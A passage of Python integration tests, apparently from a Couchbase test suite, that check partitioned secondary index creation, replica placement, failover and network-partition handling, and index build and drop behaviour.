self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
self.fail_if_no_buckets()
for bucket in self.buckets:
if bucket.name in indexes:
for index in indexes[bucket.name]:
self.assertEqual(indexes[bucket.name][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
used_bucket = 'default'
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
self.fail_if_no_buckets()
for bucket in self.buckets:
if bucket.name in indexes:
for index in indexes[bucket.name]:
if index == used_index and used_bucket == bucket.name:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
self.assertTrue(indexes[bucket.name][index]['last_known_scan_time'] == 0)
else:
continue
# Test that generates n number of create index statements with various permutations and combinations
# of different clauses used in the create index statement.
def test_create_partitioned_indexes(self):
self._load_emp_dataset(end=self.num_items)
create_index_queries = self.generate_random_create_index_statements(
bucketname=self.buckets[0].name, idx_node_list=self.node_list,
num_statements=self.num_queries)
failed_index_creation = 0
for create_index_query in create_index_queries:
try:
self.n1ql_helper.run_cbq_query(
query=create_index_query["index_definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_metadata = self.rest.get_indexer_metadata()
index_map = self.get_index_map()
if index_metadata:
status = self.validate_partitioned_indexes(create_index_query,
index_map,
index_metadata)
if not status:
failed_index_creation += 1
self.log.info(
"** Following query failed validation : {0}".format(
create_index_query["index_definition"]))
else:
failed_index_creation += 1
self.log.info(
"** Following index did not get created : {0}".format(
create_index_query["index_definition"]))
self.log.info("output from /getIndexStatus")
self.log.info(index_metadata)
self.log.info("Index Map")
self.log.info(index_map)
drop_index_query = "DROP INDEX default.{0}".format(
create_index_query["index_name"])
try:
self.n1ql_helper.run_cbq_query(
query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.log.info(
"Total Create Index Statements Run: {0}, Passed : {1}, Failed : {2}".format(
self.num_queries, self.num_queries - failed_index_creation,
failed_index_creation))
self.assertTrue(failed_index_creation == 0,
"Some create index statements failed validations. Pls see the test log above for details.")
def test_partition_index_with_excluded_nodes(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
validated = False
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
for index in index_metadata["status"]:
if index["name"] == "idx1":
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertNotIn(self.node_list[0], index["hosts"],
"Planner did not ignore excluded node during index creation")
#self.assertEqual(index["hosts"], expected_hosts,
# "Planner did not ignore excluded node during index creation")
validated = True
if not validated:
self.fail("Looks like index was not created.")
def test_replica_partition_index_with_excluded_nodes(self):
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
# Need to see if the indexes get created in the first place
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
validated = False
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], expected_hosts,
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
def test_partition_index_by_non_indexed_field(self):
self._load_emp_dataset(end=self.num_items)
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_default_num_partitions(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 6})
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 6
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_change_default_num_partitions_after_create_index(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 16})
create_index_statement = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 16
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
self.rest.set_index_settings(
{"indexer.numPartitions": 32})
create_index_statement = "CREATE INDEX idx2 on default(namesalary) partition by hash(salary) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "idx2"
index_details["num_partitions"] = 32
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
# Validate num_partitions for idx1 doesnt change
index_details = {}
index_details["index_name"] = "idx1"
index_details["num_partitions"] = 16
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Num partitions for existing indexes changed after updating default value")
def test_default_num_partitions_negative(self):
self._load_emp_dataset(end=self.num_items)
self.rest.set_index_settings(
{"indexer.numPartitions": 8})
numpartition_values_str = ["abc", "2018-03-04 18:02:37"]
numpartition_values_num = [0, -5, 46.6789]
for value in numpartition_values_str:
indexname = "index_" + str(random.randint(1, 100))
try:
self.rest.set_index_settings(
{"indexer.numPartitions": '{0}'.format(value)})
create_index_statement = "CREATE INDEX {0} on default(name,dept) partition by hash(salary) USING GSI".format(
indexname)
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = indexname
if (not isinstance(value, str)) and int(value) > 0:
index_details["num_partitions"] = int(value)
else:
index_details["num_partitions"] = 8
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
for value in numpartition_values_num:
indexname = "index_" + str(random.randint(101, 200))
try:
self.rest.set_index_settings(
{"indexer.numPartitions": value})
create_index_statement = "CREATE INDEX {0} on default(name,dept) partition by hash(salary) USING GSI".format(
indexname)
self.n1ql_helper.run_cbq_query(query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = indexname
if (not isinstance(value, str)) and int(value) > 0:
index_details["num_partitions"] = int(value)
else:
index_details["num_partitions"] = 8
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_numpartitions_negative(self):
self._load_emp_dataset(end=self.num_items)
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':null}}"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
numpartition_values_str = ["abc", "2018-03-04 18:02:37"]
for value in numpartition_values_str:
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':'{0}'}}".format(
value)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
else:
self.fail(
"Index got created with an invalid num_partition value : {0}".format(
value))
numpartition_values_num = [0, -5]
for value in numpartition_values_num:
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{0}}}".format(
value)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
else:
self.fail(
"Index got created with an invalid num_partition value : {0}".format(
value))
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {'num_partition':47.6789}"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Index did not get created with an double value for num_partition value : 47.6789")
else:
self.log.info("Index got created successfully with num_partition being a double value : 47.6789")
def test_partitioned_index_with_replica(self):
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
def test_partitioned_index_with_replica_with_server_groups(self):
self._load_emp_dataset(end=self.num_items)
self._create_server_groups()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
index_hosts_list = []
for index in index_metadata["status"]:
index_hosts_list.append(index["hosts"])
self.log.info("Index Host List : {0}".format(index_hosts_list))
# Need to change the validation logic here. Between index and its replicas, they should have a full set of partitions in both the server groups.
# idx11 - .101, .102: 3, 4, 5, 10, 11, 15, 16
# idx11 - .103, .104: 1, 2, 6, 7, 8, 9, 12, 13, 14
# idx12 - .101, .102: 1, 2, 6, 7, 8, 9, 12, 13, 14
# idx12 - .103, .104: 3, 4, 5, 10, 11, 15, 16
validation = True
for i in range(0, len(index_hosts_list)):
for j in range(i + 1, len(index_hosts_list)):
if (index_hosts_list[i].sort() != index_hosts_list[j].sort()):
continue
else:
validation &= False
self.assertTrue(validation,
"Partitions of replica indexes do not honour server grouping")
def test_create_partitioned_index_one_node_already_down(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=60)
failover_task.result()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Failed to create index with one node failed")
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
def test_create_partitioned_index_one_node_network_partitioned(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
self.start_firewall_on_node(node_out)
self.sleep(10)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Failed to create index with one node failed")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(120)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
def test_node_fails_during_create_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.failover, name="failover", args=(
self.servers[:self.nodes_init], [node_out], self.graceful,
False, 60)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(30)
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
def test_node_nw_partitioned_during_create_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
threads = []
threads.append(
Thread(target=self.start_firewall_on_node,
name="network_partitioning", args=(node_out,)))
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(10)
try:
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
if index_metadata != {}:
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
else:
self.log.info(
"Cannot retrieve index metadata since one node is down")
except Exception as ex:
self.log.info(str(ex))
finally:
self.stop_firewall_on_node(node_out)
self.sleep(30)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str in hosts,
"Partitioned index not created on all hosts")
def test_node_nw_partitioned_during_create_partitioned_index_with_node_list(
self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'nodes' : {0}}}".format(
node_list_str)
threads = []
threads.append(
Thread(target=self.start_firewall_on_node,
name="network_partitioning", args=(node_out,)))
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(create_index_statement, 10, self.n1ql_node)))
for thread in threads:
thread.start()
self.sleep(5)
for thread in threads:
thread.join()
self.sleep(10)
try:
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
if index_metadata != {}:
hosts = index_metadata["status"][0]["hosts"]
self.log.info("Actual nodes : {0}".format(hosts))
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str not in hosts,
"Partitioned index not created on expected hosts")
else:
self.log.info(
"Cannot retrieve index metadata since one node is down")
except Exception as ex:
self.log.info(str(ex))
finally:
self.stop_firewall_on_node(node_out)
self.sleep(30)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
hosts = index_metadata["status"][0]["hosts"]
node_out_str = node_out.ip + ":" + node_out.port
self.assertTrue(node_out_str in hosts,
"Partitioned index not created on all hosts")
def test_build_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
if self.num_index_replicas > 0:
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'defer_build': true, 'num_replica':{1}}};".format(
self.num_index_partitions, self.num_index_replicas)
else:
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'defer_build': true}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index building failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["index_name"] = index_name_prefix
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_build_partitioned_index_one_failed_node(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index building failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
# At this point, since one node is in a failed state, all partitions would not be built.
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata, skip_numpartitions_check=True),
"Deferred Partitioned index created not as expected")
# Recover the failed node and check if after recovery, all partitions are built.
if self.recover_failed_node:
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(180)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_failover_during_build_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
threads = []
threads.append(
Thread(target=self.n1ql_helper.run_cbq_query, name="run_query",
args=(build_index_query, 10, self.n1ql_node)))
threads.append(
Thread(target=self.cluster.async_failover, name="failover", args=(
self.servers[:self.nodes_init], [node_out], self.graceful)))
for thread in threads:
thread.start()
thread.join()
self.sleep(30)
index_map = self.get_index_map()
if node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
# At this point, since one node is in a failed state, all partitions would not be built.
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata, skip_numpartitions_check=True),
"Deferred Partitioned index created not as expected")
def test_build_partitioned_index_with_network_partitioning(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
node_list_str = "[\"" + "\",\"".join(self.node_list) + "\"]"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI WITH {{'num_partition': {0}, 'nodes': {1}, 'defer_build': true}};".format(
self.num_index_partitions, node_list_str)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = True
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
node_out = self.servers[self.node_out]
build_index_query = "BUILD INDEX on `default`(" + index_name_prefix + ")"
try:
self.start_firewall_on_node(node_out)
self.sleep(10)
self.n1ql_helper.run_cbq_query(query=build_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if not ("Index build will be retried in background" in str(ex) or "Terminate Request during cleanup" in str(ex)):
self.fail("index building failed with error : {0}".format(str(ex)))
else:
self.log.info("Index build failed with expected error")
finally:
# Heal network partition and wait for some time to allow indexes
# to get built automatically on that node
self.stop_firewall_on_node(node_out)
self.sleep(360)
index_map = self.get_index_map()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
def test_drop_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
with_clause = "WITH {{'num_partition': {0} ".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_clause += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_clause += ", 'defer_build':True"
with_clause += " }"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI {0}".format(
with_clause)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = index_name_prefix
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = self.defer_build
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
# Validation for replica indexes
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_details[
"index_name"] = index_name_prefix + " (replica {0})".format(
str(i))
self.assertTrue(
self.validate_partitioned_indexes(index_details,
index_map,
index_metadata),
"Deferred Partitioned index created not as expected")
drop_index_query = "DROP INDEX `default`." + index_name_prefix
try:
self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"Drop index failed with error : {0}".format(str(ex)))
self.sleep(30)
index_map = self.get_index_map()
self.log.info("Index map after drop index: %s", index_map)
if not index_map == {}:
self.fail("Indexes not dropped correctly")
def test_delete_bucket_cascade_drop_partitioned_index(self):
self._load_emp_dataset(end=self.num_items)
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
with_clause = "WITH {{'num_partition': {0} ".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_clause += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_clause += ", 'defer_build':True"
with_clause += " }"
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,dept,salary) partition by hash(name) USING GSI {0}".format(
with_clause)
